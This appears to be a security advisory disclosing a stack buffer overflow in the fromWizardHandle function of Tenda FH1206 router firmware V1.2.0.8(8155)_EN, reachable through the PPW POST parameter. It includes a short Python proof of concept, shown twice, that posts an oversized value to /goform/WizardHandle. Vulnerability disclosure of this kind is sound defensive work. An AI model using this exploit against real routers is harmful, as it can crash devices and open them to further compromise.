Overview

Tenda FH1206 V1.2.0.8(8155)_EN

• Firmware download website:
  • https://www.tendacn.com/hk/download/detail-2344.html
  • https://www.tendacn.com/us/download/detail-2344.html

Affected version

V1.2.0.8(8155)_EN

Vulnerability details

The Tenda FH1206 V1.2.0.8(8155)_EN has a stack overflow vulnerability located in the fromWizardHandle function.This function accepts the WANTand WANS parameter from a POST request. Within case 2, this function accepts the PPW parameter from a POST request, which is assigned to decodePwd(v22, v54);. However, since the user has control over the input of PPW, the function decodePwd() leads to a buffer overflow. The user-supplied PPW can exceed the capacity of the v54 array, thus triggering this security vulnerability.

PoC

# fromWizardHandle

import requests

ip = '192.168.0.100:80'

url = f"http://{ip}/goform/WizardHandle"

data = {"WANS":"-1","WANT":"2","PPW":'a'*999}

ret = requests.post(url, data)

Additional Information

###Product_version
Tenda FH1206 
V1.2.0.8(8155)_EN

###Affected_component
the "fromWizardHandle" function of /bin/httpd; /bin/httpd

###Attack_vector
use a simple exp to attack, like this:
#python3
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/WizardHandle"
data = {"WANS":"-1","WANT":"2","PPW":'a'*999}
ret = requests.post(url, data)

###Discription
Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the PPW parameter at ip/goform/WizardHandle.

###Refernce
<https://palm-vertebra-fe9.notion.site/fromWizardHandle-98e188c072984620a907ea5df0d80ad5>
<https://www.tendacn.com/hk/download/detail-2344.html>